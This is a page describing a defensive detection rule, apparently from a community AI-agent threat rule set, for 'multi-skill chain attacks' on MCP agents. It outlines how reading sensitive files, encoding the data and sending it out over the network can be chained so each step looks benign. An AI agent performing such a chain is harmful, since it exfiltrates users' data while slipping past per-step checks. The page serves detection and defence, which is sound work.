Skip to content
ATR-2026-00063criticalTool Poisoningexperimental

Multi-Skill Chain Attack

Detects attack sequences where multiple MCP skills are chained together to achieve a malicious outcome that no single skill could accomplish alone. For example: (1) a reconnaissance skill reads sensitive files, (2) an encoding skill obfuscates the data, (3) a network skill exfiltrates it. Each step appears benign individually but the chain constitutes data exfiltration.

嚴重度
critical
類別
Tool Poisoning
掃描目標
mcp
作者
ATR Community

建議回應

block toolalertsnapshotescalate

參考資料

OWASP Agentic
ASI02:2026 - Tool Misuse and Exploitation
OWASP LLM
LLM03:2025 - Supply Chain VulnerabilitiesLLM06:2025 - Excessive Agency
MITRE ATLAS
AML.T0024 - Exfiltration via ML Inference APIAML.T0053 - LLM Plugin Compromise
在 GitHub 上查看完整 YAML →

更多 Tool Poisoning 規則

ATR-2026-00010criticalMalicious Content in MCP Tool ResponseATR-2026-00011highInstruction Injection via Tool OutputATR-2026-00012highUnauthorized Tool Call DetectionATR-2026-00013criticalSSRF via Agent Tool CallsATR-2026-00061mediumSkill Description-Behavior Mismatch